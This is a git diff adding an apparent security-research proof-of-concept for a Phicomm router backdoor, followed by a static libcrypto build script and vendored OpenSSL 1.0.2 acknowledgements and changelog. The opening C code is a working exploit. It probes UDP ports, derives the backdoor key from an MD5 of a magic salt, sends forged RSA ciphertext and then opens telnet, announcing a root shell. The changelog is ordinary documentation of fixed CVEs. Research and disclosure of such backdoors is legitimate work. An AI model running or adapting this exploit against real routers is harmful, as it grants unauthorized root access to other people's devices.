+  gettimeofday(&timecheck, NULL);
+  start = (long)timecheck.tv_sec * 1000 + (long)timecheck.tv_usec / 1000;
+
+  //////////////////////////
+  // Port scan
+  // ////////////////////////
+  if (ports_to_scan != NULL) {
+    printf("[+] About to scan %d ports...\n", number_of_ports_to_scan);
+    for (i = 0; i < number_of_ports_to_scan; i++) {
+      backdoor_port = ports_to_scan[i];
+      device_info = probe_udp_port(device_list, 
+          ip_addr, backdoor_port, 
+          (unsigned char *) handshake_token, 
+          strlen((char *) handshake_token)); 
+      if (device_info != NULL) {
+        break;
+      }
+    }
+  
+
+    if (device_info == NULL) {
+      printf("[x] Failed to solicit identifying handshake on the following ports:\n");
+      for (i = 0; i < number_of_ports_to_scan; i++) {
+        printf("    - %d\n", ports_to_scan[i]);
+      }
+      if (number_of_ports_to_scan > 1) {
+        exit(1);
+      } else {
+        printf("[+] But you only specified one port, so we'll perservere with a null key.\n");
+        rsa = NULL;
+        goto STAGE_II;
+      }
+    } else {
+      rsa = init_rsa((char *) device_info->public_n, device_info->public_e);
+      goto STAGE_II;
+    }
+  }
+
+
+  int no_reply = 0;
+  int got_reply = 0;
+  float ratio = 1.0;
+
+#define QUALITY_CONTROL(__com_res) { if ((__com_res) == -1) { \
+  no_reply ++; \
+  ratio = 100 * got_reply / (no_reply + got_reply); \
+  printf("[x] No reply (received replies %d times out of %d (%.2f%%)).\n", got_reply, no_reply + got_reply, ratio); \
+  stage_delay += DELAY_INCREMENT; \
+  goto STAGE_I;  \
+} else if (stage_delay > DELAY_DECREMENT) { \
+  got_reply ++; \
+  stage_delay -= DELAY_DECREMENT; \
+} }
+
+  /* something should be done here to reset the state machine */
+  int on_try = 0;
+  int com_res = 0;
+
+  if (legacy_mode) {
+    device_info = lookup_device_name(device_list, FALLBACK);
+    printf("[+] Setting RSA key for legacy mode\n");
+    rsa = init_rsa((char *) device_info->public_n, device_info->public_e);
+  }
+
+// we only need to define this once, since it's constant
+//
+  int backdoor_key_len = 0x10;
+  memset(backdoor_key, 0, backdoor_key_len);
+  char unhashed_backdoor_key[0x10];
+  snprintf(unhashed_backdoor_key, 0xf, "+%s", magic_salt);
+  md5raw(backdoor_key, (unsigned char *) unhashed_backdoor_key, strlen(unhashed_backdoor_key));
+
+
+  do {
+    
+    goto STAGE_I;
+
+STAGE_I:
+    on_try += 1;
+
+    /* Test to see if the telnet port is open. */
+    if (temp_mode && check_tcp_port(ip_addr, telnet_port)) {
+
+      gettimeofday(&timecheck, NULL);
+      elapsed = ((long)timecheck.tv_sec * 1000 + (long)timecheck.tv_usec / 1000) - start;
+
+      printf("[*] Backdoor lock picked in %ld msec with %d attempts.\n", elapsed, on_try);
+      printf("[*] Please enjoy your root shell.\n");
+      system(telnet_command);
+      printf("[*] PoC complete. Have a nice day.\n");
+      exit(0);
+    } else {
+      printf("[+] Not yet. %d tries remaining...\n", tries-on_try);
+    }
+
+    if (legacy_mode || no_secret_mode) {
+      goto STAGE_II;
+    }
+    usleep(stage_delay);
+    memset(buffer, 0, 0x80);
+    status("I", on_try, tries, stage_delay, ratio, modetext);
+    printf("[+] Sending handshake token: %s\n", handshake_token);
+    printf("[-] Waiting for device identifying hash...\n");
+    QUALITY_CONTROL(communicate(ip_addr, backdoor_port,
+        (unsigned char *) handshake_token,
+        strlen((char *) handshake_token),
+        buffer,
+        16,
+        stage_delay));
+
+    printf("[+] Received device identifying hash:\n");
+    hexdump(buffer, 16);
+
+    if (!legacy_mode) {
+      if (device_info == NULL) {
+        if ((device_info = lookup_device_hash(device_list, buffer))) {
+          rsa = init_rsa((char *) device_info->public_n, device_info->public_e);
+        } else {
+          legacy_mode = 1;
+          device_info = lookup_device_name(device_list, FALLBACK);
+          rsa = init_rsa((char *) device_info->public_n, device_info->public_e);
+        }
+      } else {
+        // not strictly necessary, but I like to make sure everything's in order
+        if (0 != memcmp(device_info->hash, buffer, 16)) {
+          printf("[x] Discrepancy in device identifying hash. Expected:\n");
+          hexdump(device_info->hash, 16);
+          if (rsa != NULL) {
+            exit(1);
+          }
+        } else {
+          printf("[+] Device identifying hash matches MD5(\"%s\").\n", device_info->identifier);
+        }
+      }
+    } else {
+      printf("[!] Not checking hash (CHAOS MODE).\n");
+    }
+    goto STAGE_II;
+
+STAGE_II:
+    usleep(stage_delay);
+    memset(buffer, 0, 0x80);
+    bar('=');
+    printf("[*] ENTERING STAGE II (round %d/%d) (d: %d, rr: %.2f%%) IN %s\n", on_try, tries,
+        stage_delay,
+        ratio,
+        modetext);
+    bar('=');
+    memset(buffer, 0, CIPHERTEXT_LENGTH);
+    find_phony_ciphertext(rsa, 
+        phony_ciphertext,
+        phony_plaintext,
+        backdoor_key, 
+        backdoor_key_len, 
+        no_secret_mode ? OLD_WAY : NULL_COLLISION);  
+    com_res = communicate(ip_addr, backdoor_port,
+        phony_ciphertext,
+        CIPHERTEXT_LENGTH,
+        buffer,
+        no_secret_mode ? 0 : 0x20,
+        stage_delay);
+    QUALITY_CONTROL(com_res);
+    goto STAGE_III;
+
+STAGE_III:
+    usleep(stage_delay);
+    memset(buffer, 0, 0x80);
+    bar('=');
+    printf("[*] ENTERING STAGE III (round %d/%d) (d: %d, rr: %.2f%%) IN %s\n", on_try, tries,
+        stage_delay,
+        ratio,
+        modetext);
+    bar('=');
+    printf("[+] Sending MD5('+%s') and hoping for collision...\n",
+        (char *) magic_salt);
+
+    unsigned char msg[0x10];
+    if (no_secret_mode) {
+      char s[0x200];
+      snprintf(s, 0x180, "%s+%s", (char *) phony_plaintext, magic_salt);
+      md5raw(msg, (unsigned char *) s, strlen(s)); 
+    } else {
+      memcpy(msg, backdoor_key, 0x10);
+    }
+
+    com_res = communicate(ip_addr, backdoor_port,
+        backdoor_key,
+        backdoor_key_len,
+        buffer,
+        0,
+        stage_delay);
+    QUALITY_CONTROL(com_res);
+
+
+    usleep(stage_delay);
+
+  } while (tries - on_try > 0);
+  
+  return 0;
+}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/mk-libcrypto.sh b/Phicomm/backdoor-lockpick_tra-2022-01/mk-libcrypto.sh
new file mode 100755
index 0000000..8b21132
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/mk-libcrypto.sh
@@ -0,0 +1,15 @@
+#! /usr/bin/env bash
+
+SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" &> /dev/null && pwd )"
+set -e
+pushd openssl-1.0.2
+
+C_INCLUDE_PATH=/usr/lib/musl/include CC=musl-gcc ./Configure no-shared no-zlib disable-ec enable-rsa enable-md5 no-ssl2 no-ssl3 no-threads no-krb5 no-asm no-hw no-dso no-engine no-dtls1 no-idea no-comp no-err no-psk no-srp linux-x86_64-musl --prefix=$(realpath "$SCRIPT_DIR"/opt) --openssldir=$(realpath "$SCRIPT_DIR"/opt) 
+
+make depend
+
+make -j $(nproc) build_crypto
+
+cp -v libcrypto.a ..
+
+popd
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ACKNOWLEDGMENTS b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ACKNOWLEDGMENTS
new file mode 100644
index 0000000..59c6f01
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ACKNOWLEDGMENTS
@@ -0,0 +1,30 @@
+The OpenSSL project depends on volunteer efforts and financial support from
+the end user community. That support comes in the form of donations and paid
+sponsorships, software support contracts, paid consulting services
+and commissioned software development.
+
+Since all these activities support the continued development and improvement
+of OpenSSL we consider all these clients and customers as sponsors of the
+OpenSSL project.
+
+We would like to identify and thank the following such sponsors for their past
+or current significant support of the OpenSSL project:
+
+Major support:
+
+	Qualys		http://www.qualys.com/
+
+Very significant support:
+
+	OpenGear:	http://www.opengear.com/
+
+Significant support:
+
+	PSW Group:	http://www.psw.net/
+	Acano Ltd.	http://acano.com/
+
+Please note that we ask permission to identify sponsors and that some sponsors
+we consider eligible for inclusion here have requested to remain anonymous.
+
+Additional sponsorship or financial support is always welcome: for more
+information please contact the OpenSSL Software Foundation.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/CHANGES b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/CHANGES
new file mode 100644
index 0000000..b5b3dd2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/CHANGES
@@ -0,0 +1,10879 @@
+
+ OpenSSL CHANGES
+ _______________
+
+ Changes between 1.0.1l and 1.0.2 [22 Jan 2015]
+
+  *) SRTP Memory Leak.
+
+     A flaw in the DTLS SRTP extension parsing code allows an attacker, who
+     sends a carefully crafted handshake message, to cause OpenSSL to fail
+     to free up to 64k of memory causing a memory leak. This could be
+     exploited in a Denial Of Service attack. This issue affects OpenSSL
+     1.0.1 server implementations for both SSL/TLS and DTLS regardless of
+     whether SRTP is used or configured. Implementations of OpenSSL that
+     have been compiled with OPENSSL_NO_SRTP defined are not affected.
+
+     The fix was developed by the OpenSSL team.
+     (CVE-2014-3513)
+     [OpenSSL team]
+
+  *) Session Ticket Memory Leak.
+
+     When an OpenSSL SSL/TLS/DTLS server receives a session ticket the
+     integrity of that ticket is first verified. In the event of a session
+     ticket integrity check failing, OpenSSL will fail to free memory
+     causing a memory leak. By sending a large number of invalid session
+     tickets an attacker could exploit this issue in a Denial Of Service
+     attack.
+     (CVE-2014-3567)
+     [Steve Henson]
+
+  *) Build option no-ssl3 is incomplete.
+
+     When OpenSSL is configured with "no-ssl3" as a build option, servers
+     could accept and complete a SSL 3.0 handshake, and clients could be
+     configured to send them.
+     (CVE-2014-3568)
+     [Akamai and the OpenSSL team]
+
+  *) Add support for TLS_FALLBACK_SCSV.
+     Client applications doing fallback retries should call
+     SSL_set_mode(s, SSL_MODE_SEND_FALLBACK_SCSV).
+     (CVE-2014-3566)
+     [Adam Langley, Bodo Moeller]
+
+  *) Facilitate "universal" ARM builds targeting range of ARM ISAs, e.g.
+     ARMv5 through ARMv8, as opposite to "locking" it to single one.
+     So far those who have to target multiple plaforms would compromise
+     and argue that binary targeting say ARMv5 would still execute on
+     ARMv8. "Universal" build resolves this compromise by providing
+     near-optimal performance even on newer platforms.
+     [Andy Polyakov]
+
+  *) Accelerated NIST P-256 elliptic curve implementation for x86_64
+     (other platforms pending).
+     [Shay Gueron & Vlad Krasnov (Intel Corp), Andy Polyakov]
+
+  *) Add support for the SignedCertificateTimestampList certificate and
+     OCSP response extensions from RFC6962.
+     [Rob Stradling]
+
+  *) Fix ec_GFp_simple_points_make_affine (thus, EC_POINTs_mul etc.)
+     for corner cases. (Certain input points at infinity could lead to
+     bogus results, with non-infinity inputs mapped to infinity too.)
+     [Bodo Moeller]
+
+  *) Initial support for PowerISA 2.0.7, first implemented in POWER8.
+     This covers AES, SHA256/512 and GHASH. "Initial" means that most
+     common cases are optimized and there still is room for further
+     improvements. Vector Permutation AES for Altivec is also added.
+     [Andy Polyakov]
+
+  *) Add support for little-endian ppc64 Linux target.
+     [Marcelo Cerri (IBM)]
+
+  *) Initial support for AMRv8 ISA crypto extensions. This covers AES,
+     SHA1, SHA256 and GHASH. "Initial" means that most common cases
+     are optimized and there still is room for further improvements.
+     Both 32- and 64-bit modes are supported.
+     [Andy Polyakov, Ard Biesheuvel (Linaro)]
+
+  *) Improved ARMv7 NEON support.
+     [Andy Polyakov]
+
+  *) Support for SPARC Architecture 2011 crypto extensions, first
+     implemented in SPARC T4. This covers AES, DES, Camellia, SHA1,
+     SHA256/512, MD5, GHASH and modular exponentiation.
+     [Andy Polyakov, David Miller]
+
+  *) Accelerated modular exponentiation for Intel processors, a.k.a.
+     RSAZ.
+     [Shay Gueron & Vlad Krasnov (Intel Corp)]
+
+  *) Support for new and upcoming Intel processors, including AVX2,
+     BMI and SHA ISA extensions. This includes additional "stitched"
+     implementations, AESNI-SHA256 and GCM, and multi-buffer support
+     for TLS encrypt.
+
+     This work was sponsored by Intel Corp.
+     [Andy Polyakov]
+
+  *) Support for DTLS 1.2. This adds two sets of DTLS methods: DTLS_*_method()
+     supports both DTLS 1.2 and 1.0 and should use whatever version the peer
+     supports and DTLSv1_2_*_method() which supports DTLS 1.2 only.
+     [Steve Henson]
+
+  *) Use algorithm specific chains in SSL_CTX_use_certificate_chain_file():
+     this fixes a limiation in previous versions of OpenSSL.
+     [Steve Henson]
+
+  *) Extended RSA OAEP support via EVP_PKEY API. Options to specify digest,
+     MGF1 digest and OAEP label.
+     [Steve Henson]
+
+  *) Add EVP support for key wrapping algorithms, to avoid problems with
+     existing code the flag EVP_CIPHER_CTX_WRAP_ALLOW has to be set in
+     the EVP_CIPHER_CTX or an error is returned. Add AES and DES3 wrap
+     algorithms and include tests cases.
+     [Steve Henson]
+
+  *) Add functions to allocate and set the fields of an ECDSA_METHOD
+     structure.
+     [Douglas E. Engert, Steve Henson]
+
+  *) New functions OPENSSL_gmtime_diff and ASN1_TIME_diff to find the
+     difference in days and seconds between two tm or ASN1_TIME structures.
+     [Steve Henson]
+
+  *) Add -rev test option to s_server to just reverse order of characters
+     received by client and send back to server. Also prints an abbreviated
+     summary of the connection parameters.
+     [Steve Henson]
+
+  *) New option -brief for s_client and s_server to print out a brief summary
+     of connection parameters.
+     [Steve Henson]
+
+  *) Add callbacks for arbitrary TLS extensions.
+     [Trevor Perrin <trevp@trevp.net> and Ben Laurie]
+
+  *) New option -crl_download in several openssl utilities to download CRLs
+     from CRLDP extension in certificates.
+     [Steve Henson]
+
+  *) New options -CRL and -CRLform for s_client and s_server for CRLs.
+     [Steve Henson]
+
+  *) New function X509_CRL_diff to generate a delta CRL from the difference
+     of two full CRLs. Add support to "crl" utility.
+     [Steve Henson]
+
+  *) New functions to set lookup_crls function and to retrieve
+     X509_STORE from X509_STORE_CTX.
+     [Steve Henson]
+
+  *) Print out deprecated issuer and subject unique ID fields in
+     certificates.
+     [Steve Henson]
+
+  *) Extend OCSP I/O functions so they can be used for simple general purpose
+     HTTP as well as OCSP. New wrapper function which can be used to download
+     CRLs using the OCSP API.
+     [Steve Henson]
+
+  *) Delegate command line handling in s_client/s_server to SSL_CONF APIs.
+     [Steve Henson]
+
+  *) SSL_CONF* functions. These provide a common framework for application
+     configuration using configuration files or command lines.
+     [Steve Henson]
+
+  *) SSL/TLS tracing code. This parses out SSL/TLS records using the
+     message callback and prints the results. Needs compile time option
+     "enable-ssl-trace". New options to s_client and s_server to enable
+     tracing.
+     [Steve Henson]
+
+  *) New ctrl and macro to retrieve supported points extensions.
+     Print out extension in s_server and s_client.
+     [Steve Henson]
+
+  *) New functions to retrieve certificate signature and signature
+     OID NID.
+     [Steve Henson]
+
+  *) Add functions to retrieve and manipulate the raw cipherlist sent by a
+     client to OpenSSL.
+     [Steve Henson]
+
+  *) New Suite B modes for TLS code. These use and enforce the requirements
+     of RFC6460: restrict ciphersuites, only permit Suite B algorithms and
+     only use Suite B curves. The Suite B modes can be set by using the
+     strings "SUITEB128", "SUITEB192" or "SUITEB128ONLY" for the cipherstring.
+     [Steve Henson]
+
+  *) New chain verification flags for Suite B levels of security. Check
+     algorithms are acceptable when flags are set in X509_verify_cert.
+     [Steve Henson]
+
+  *) Make tls1_check_chain return a set of flags indicating checks passed
+     by a certificate chain. Add additional tests to handle client
+     certificates: checks for matching certificate type and issuer name
+     comparison.
+     [Steve Henson]
+
+  *) If an attempt is made to use a signature algorithm not in the peer
+     preference list abort the handshake. If client has no suitable
+     signature algorithms in response to a certificate request do not
+     use the certificate.
+     [Steve Henson]
+
+  *) If server EC tmp key is not in client preference list abort handshake.
+     [Steve Henson]
+
+  *) Add support for certificate stores in CERT structure. This makes it
+     possible to have different stores per SSL structure or one store in
+     the parent SSL_CTX. Include distint stores for certificate chain
+     verification and chain building. New ctrl SSL_CTRL_BUILD_CERT_CHAIN
+     to build and store a certificate chain in CERT structure: returing
+     an error if the chain cannot be built: this will allow applications
+     to test if a chain is correctly configured.
+
+     Note: if the CERT based stores are not set then the parent SSL_CTX
+     store is used to retain compatibility with existing behaviour.
+
+     [Steve Henson]
+
+  *) New function ssl_set_client_disabled to set a ciphersuite disabled
+     mask based on the current session, check mask when sending client
+     hello and checking the requested ciphersuite.
+     [Steve Henson]
+
+  *) New ctrls to retrieve and set certificate types in a certificate
+     request message. Print out received values in s_client. If certificate
+     types is not set with custom values set sensible values based on
+     supported signature algorithms.
+     [Steve Henson]
+
+  *) Support for distinct client and server supported signature algorithms.
+     [Steve Henson]
+
+  *) Add certificate callback. If set this is called whenever a certificate
+     is required by client or server. An application can decide which
+     certificate chain to present based on arbitrary criteria: for example
+     supported signature algorithms. Add very simple example to s_server.
+     This fixes many of the problems and restrictions of the existing client
+     certificate callback: for example you can now clear an existing
+     certificate and specify the whole chain.
+     [Steve Henson]
+
+  *) Add new "valid_flags" field to CERT_PKEY structure which determines what
+     the certificate can be used for (if anything). Set valid_flags field 
+     in new tls1_check_chain function. Simplify ssl_set_cert_masks which used
+     to have similar checks in it.
+
+     Add new "cert_flags" field to CERT structure and include a "strict mode".
+     This enforces some TLS certificate requirements (such as only permitting
+     certificate signature algorithms contained in the supported algorithms
+     extension) which some implementations ignore: this option should be used
+     with caution as it could cause interoperability issues.
+     [Steve Henson]
+
+  *) Update and tidy signature algorithm extension processing. Work out
+     shared signature algorithms based on preferences and peer algorithms
+     and print them out in s_client and s_server. Abort handshake if no
+     shared signature algorithms.
+     [Steve Henson]
+
+  *) Add new functions to allow customised supported signature algorithms
+     for SSL and SSL_CTX structures. Add options to s_client and s_server
+     to support them.
+     [Steve Henson]
+
+  *) New function SSL_certs_clear() to delete all references to certificates
+     from an SSL structure. Before this once a certificate had been added
+     it couldn't be removed.
+     [Steve Henson]
+
+  *) Integrate hostname, email address and IP address checking with certificate
+     verification. New verify options supporting checking in opensl utility.
+     [Steve Henson]
+
+  *) Fixes and wildcard matching support to hostname and email checking
+     functions. Add manual page.
+     [Florian Weimer (Red Hat Product Security Team)]
+
+  *) New functions to check a hostname email or IP address against a
+     certificate. Add options x509 utility to print results of checks against
+     a certificate.
+     [Steve Henson]
+
+  *) Fix OCSP checking.
+     [Rob Stradling <rob.stradling@comodo.com> and Ben Laurie]
+
+  *) Initial experimental support for explicitly trusted non-root CAs. 
+     OpenSSL still tries to build a complete chain to a root but if an
+     intermediate CA has a trust setting included that is used. The first
+     setting is used: whether to trust (e.g., -addtrust option to the x509
+     utility) or reject.
+     [Steve Henson]
+
+  *) Add -trusted_first option which attempts to find certificates in the
+     trusted store even if an untrusted chain is also supplied.
+     [Steve Henson]
+
+  *) MIPS assembly pack updates: support for MIPS32r2 and SmartMIPS ASE,
+     platform support for Linux and Android.
+     [Andy Polyakov]
+
+  *) Support for linux-x32, ILP32 environment in x86_64 framework.
+     [Andy Polyakov]
+
+  *) Experimental multi-implementation support for FIPS capable OpenSSL.
+     When in FIPS mode the approved implementations are used as normal,
+     when not in FIPS mode the internal unapproved versions are used instead.
+     This means that the FIPS capable OpenSSL isn't forced to use the
+     (often lower perfomance) FIPS implementations outside FIPS mode.
+     [Steve Henson]
+
+  *) Transparently support X9.42 DH parameters when calling
+     PEM_read_bio_DHparameters. This means existing applications can handle
+     the new parameter format automatically.
+     [Steve Henson]
+
+  *) Initial experimental support for X9.42 DH parameter format: mainly
+     to support use of 'q' parameter for RFC5114 parameters.
+     [Steve Henson]
+
+  *) Add DH parameters from RFC5114 including test data to dhtest.
+     [Steve Henson]
+
+  *) Support for automatic EC temporary key parameter selection. If enabled
+     the most preferred EC parameters are automatically used instead of
+     hardcoded fixed parameters. Now a server just has to call:
+     SSL_CTX_set_ecdh_auto(ctx, 1) and the server will automatically
+     support ECDH and use the most appropriate parameters.
+     [Steve Henson]
+
+  *) Enhance and tidy EC curve and point format TLS extension code. Use
+     static structures instead of allocation if default values are used.
+     New ctrls to set curves we wish to support and to retrieve shared curves.
+     Print out shared curves in s_server. New options to s_server and s_client
+     to set list of supported curves.
+     [Steve Henson]
+
+  *) New ctrls to retrieve supported signature algorithms and 
+     supported curve values as an array of NIDs. Extend openssl utility
+     to print out received values.
+     [Steve Henson]
+
+  *) Add new APIs EC_curve_nist2nid and EC_curve_nid2nist which convert
+     between NIDs and the more common NIST names such as "P-256". Enhance
+     ecparam utility and ECC method to recognise the NIST names for curves.
+     [Steve Henson]
+
+  *) Enhance SSL/TLS certificate chain handling to support different
+     chains for each certificate instead of one chain in the parent SSL_CTX.
+     [Steve Henson]
+
+  *) Support for fixed DH ciphersuite client authentication: where both
+     server and client use DH certificates with common parameters.
+     [Steve Henson]
+
+  *) Support for fixed DH ciphersuites: those requiring DH server
+     certificates.
+     [Steve Henson]
+
+  *) New function i2d_re_X509_tbs for re-encoding the TBS portion of
+     the certificate.
+     Note: Related 1.0.2-beta specific macros X509_get_cert_info,
+     X509_CINF_set_modified, X509_CINF_get_issuer, X509_CINF_get_extensions and
+     X509_CINF_get_signature were reverted post internal team review.
+
+ Changes between 1.0.1k and 1.0.1l [15 Jan 2015]
+
+  *) Build fixes for the Windows and OpenVMS platforms
+     [Matt Caswell and Richard Levitte]
+
+ Changes between 1.0.1j and 1.0.1k [8 Jan 2015]
+
+  *) Abort handshake if server key exchange message is omitted for ephemeral
+     ECDH ciphersuites.
+
+     Thanks to Karthikeyan Bhargavan of the PROSECCO team at INRIA for
+     reporting this issue.
+     (CVE-2014-3572)
+     [Steve Henson]
+
+  *) Remove non-export ephemeral RSA code on client and server. This code
+     violated the TLS standard by allowing the use of temporary RSA keys in
+     non-export ciphersuites and could be used by a server to effectively
+     downgrade the RSA key length used to a value smaller than the server
+     certificate. Thanks for Karthikeyan Bhargavan of the PROSECCO team at
+     INRIA or reporting this issue.
+     (CVE-2015-0204)
+     [Steve Henson]
+
+  *) Ensure that the session ID context of an SSL is updated when its
+     SSL_CTX is updated via SSL_set_SSL_CTX.
+
+     The session ID context is typically set from the parent SSL_CTX,
+     and can vary with the CTX.
+     [Adam Langley]
+
+  *) Fix various certificate fingerprint issues.
+
+     By using non-DER or invalid encodings outside the signed portion of a
+     certificate the fingerprint can be changed without breaking the signature.
+     Although no details of the signed portion of the certificate can be changed
+     this can cause problems with some applications: e.g. those using the
+     certificate fingerprint for blacklists.
+
+     1. Reject signatures with non zero unused bits.
+
+     If the BIT STRING containing the signature has non zero unused bits reject
+     the signature. All current signature algorithms require zero unused bits.
+
+     2. Check certificate algorithm consistency.
+
+     Check the AlgorithmIdentifier inside TBS matches the one in the
+     certificate signature. NB: this will result in signature failure
+     errors for some broken certificates.
+
+     Thanks to Konrad Kraszewski from Google for reporting this issue.
+
+     3. Check DSA/ECDSA signatures use DER.
+
+     Reencode DSA/ECDSA signatures and compare with the original received
+     signature. Return an error if there is a mismatch.
+
+     This will reject various cases including garbage after signature
+     (thanks to Antti Karjalainen and Tuomo Untinen from the Codenomicon CROSS
+     program for discovering this case) and use of BER or invalid ASN.1 INTEGERs
+     (negative or with leading zeroes).
+
+     Further analysis was conducted and fixes were developed by Stephen Henson
+     of the OpenSSL core team.
+
+     (CVE-2014-8275)
+     [Steve Henson]
+
+   *) Do not resume sessions on the server if the negotiated protocol
+      version does not match the session's version. Resuming with a different
+      version, while not strictly forbidden by the RFC, is of questionable
+      sanity and breaks all known clients.
+      [David Benjamin, Emilia Käsper]
+
+   *) Tighten handling of the ChangeCipherSpec (CCS) message: reject
+      early CCS messages during renegotiation. (Note that because
+      renegotiation is encrypted, this early CCS was not exploitable.)
+      [Emilia Käsper]
+
+   *) Tighten client-side session ticket handling during renegotiation:
+      ensure that the client only accepts a session ticket if the server sends
+      the extension anew in the ServerHello. Previously, a TLS client would
+      reuse the old extension state and thus accept a session ticket if one was
+      announced in the initial ServerHello.
+
+      Similarly, ensure that the client requires a session ticket if one
+      was advertised in the ServerHello. Previously, a TLS client would
+      ignore a missing NewSessionTicket message.
+      [Emilia Käsper]
+
+ Changes between 1.0.1i and 1.0.1j [15 Oct 2014]
+
+  *) SRTP Memory Leak.
+
+     A flaw in the DTLS SRTP extension parsing code allows an attacker, who
+     sends a carefully crafted handshake message, to cause OpenSSL to fail
+     to free up to 64k of memory causing a memory leak. This could be
+     exploited in a Denial Of Service attack. This issue affects OpenSSL
+     1.0.1 server implementations for both SSL/TLS and DTLS regardless of
+     whether SRTP is used or configured. Implementations of OpenSSL that
+     have been compiled with OPENSSL_NO_SRTP defined are not affected.
+
+     The fix was developed by the OpenSSL team.
+     (CVE-2014-3513)
+     [OpenSSL team]
+
+  *) Session Ticket Memory Leak.
+
+     When an OpenSSL SSL/TLS/DTLS server receives a session ticket the
+     integrity of that ticket is first verified. In the event of a session
+     ticket integrity check failing, OpenSSL will fail to free memory
+     causing a memory leak. By sending a large number of invalid session
+     tickets an attacker could exploit this issue in a Denial Of Service
+     attack.
+     (CVE-2014-3567)
+     [Steve Henson]
+
+  *) Build option no-ssl3 is incomplete.
+
+     When OpenSSL is configured with "no-ssl3" as a build option, servers
+     could accept and complete a SSL 3.0 handshake, and clients could be
+     configured to send them.
+     (CVE-2014-3568)
+     [Akamai and the OpenSSL team]
+
+  *) Add support for TLS_FALLBACK_SCSV.
+     Client applications doing fallback retries should call
+     SSL_set_mode(s, SSL_MODE_SEND_FALLBACK_SCSV).
+     (CVE-2014-3566)
+     [Adam Langley, Bodo Moeller]
+
+  *) Add additional DigestInfo checks.
+ 
+     Reencode DigestInto in DER and check against the original when
+     verifying RSA signature: this will reject any improperly encoded
+     DigestInfo structures.
+
+     Note: this is a precautionary measure and no attacks are currently known.
+
+     [Steve Henson]
+
+ Changes between 1.0.1h and 1.0.1i [6 Aug 2014]
+
+  *) Fix SRP buffer overrun vulnerability. Invalid parameters passed to the
+     SRP code can be overrun an internal buffer. Add sanity check that
+     g, A, B < N to SRP code.
+
+     Thanks to Sean Devlin and Watson Ladd of Cryptography Services, NCC
+     Group for discovering this issue.
+     (CVE-2014-3512)
+     [Steve Henson]
+
+  *) A flaw in the OpenSSL SSL/TLS server code causes the server to negotiate
+     TLS 1.0 instead of higher protocol versions when the ClientHello message
+     is badly fragmented. This allows a man-in-the-middle attacker to force a
+     downgrade to TLS 1.0 even if both the server and the client support a
+     higher protocol version, by modifying the client's TLS records.
+
+     Thanks to David Benjamin and Adam Langley (Google) for discovering and
+     researching this issue.
+     (CVE-2014-3511)
+     [David Benjamin]
+
+  *) OpenSSL DTLS clients enabling anonymous (EC)DH ciphersuites are subject
+     to a denial of service attack. A malicious server can crash the client
+     with a null pointer dereference (read) by specifying an anonymous (EC)DH
+     ciphersuite and sending carefully crafted handshake messages.
+
+     Thanks to Felix Gröbert (Google) for discovering and researching this
+     issue.
+     (CVE-2014-3510)
+     [Emilia Käsper]
+
+  *) By sending carefully crafted DTLS packets an attacker could cause openssl
+     to leak memory. This can be exploited through a Denial of Service attack.
+     Thanks to Adam Langley for discovering and researching this issue.
+     (CVE-2014-3507)
+     [Adam Langley]
+
+  *) An attacker can force openssl to consume large amounts of memory whilst
+     processing DTLS handshake messages. This can be exploited through a
+     Denial of Service attack.
+     Thanks to Adam Langley for discovering and researching this issue.
+     (CVE-2014-3506)
+     [Adam Langley]
+
+  *) An attacker can force an error condition which causes openssl to crash
+     whilst processing DTLS packets due to memory being freed twice. This
+     can be exploited through a Denial of Service attack.
+     Thanks to Adam Langley and Wan-Teh Chang for discovering and researching
+     this issue.
+     (CVE-2014-3505)
+     [Adam Langley]
+
+  *) If a multithreaded client connects to a malicious server using a resumed
+     session and the server sends an ec point format extension it could write
+     up to 255 bytes to freed memory.
+
+     Thanks to Gabor Tyukasz (LogMeIn Inc) for discovering and researching this
+     issue.
+     (CVE-2014-3509)
+     [Gabor Tyukasz]
+
+  *) A malicious server can crash an OpenSSL client with a null pointer
+     dereference (read) by specifying an SRP ciphersuite even though it was not
+     properly negotiated with the client. This can be exploited through a
+     Denial of Service attack.
+
+     Thanks to Joonas Kuorilehto and Riku Hietamäki (Codenomicon) for
+     discovering and researching this issue.
+     (CVE-2014-5139)
+     [Steve Henson]
+
+  *) A flaw in OBJ_obj2txt may cause pretty printing functions such as
+     X509_name_oneline, X509_name_print_ex et al. to leak some information
+     from the stack. Applications may be affected if they echo pretty printing
+     output to the attacker.
+
+     Thanks to Ivan Fratric (Google) for discovering this issue.
+     (CVE-2014-3508)
+     [Emilia Käsper, and Steve Henson]
+
+  *) Fix ec_GFp_simple_points_make_affine (thus, EC_POINTs_mul etc.)
+     for corner cases. (Certain input points at infinity could lead to
+     bogus results, with non-infinity inputs mapped to infinity too.)
+     [Bodo Moeller]
+
+ Changes between 1.0.1i and 1.0.1j [xx XXX xxxx]
+
+  *) Add additional DigestInfo checks.
+ 
+     Reencode DigestInto in DER and check against the original when
+     verifying RSA signature: this will reject any improperly encoded
+     DigestInfo structures.
+
+     Note: this is a precautionary measure and no attacks are currently known.
+
+     [Steve Henson]
+
+ Changes between 1.0.1g and 1.0.1h [5 Jun 2014]
+
+  *) Fix for SSL/TLS MITM flaw. An attacker using a carefully crafted
+     handshake can force the use of weak keying material in OpenSSL
+     SSL/TLS clients and servers.
+
+     Thanks to KIKUCHI Masashi (Lepidum Co. Ltd.) for discovering and
+     researching this issue. (CVE-2014-0224)
+     [KIKUCHI Masashi, Steve Henson]
+
+  *) Fix DTLS recursion flaw. By sending an invalid DTLS handshake to an
+     OpenSSL DTLS client the code can be made to recurse eventually crashing
+     in a DoS attack.
+
+     Thanks to Imre Rad (Search-Lab Ltd.) for discovering this issue.
+     (CVE-2014-0221)
+     [Imre Rad, Steve Henson]
+
+  *) Fix DTLS invalid fragment vulnerability. A buffer overrun attack can
+     be triggered by sending invalid DTLS fragments to an OpenSSL DTLS
+     client or server. This is potentially exploitable to run arbitrary
+     code on a vulnerable client or server.
+
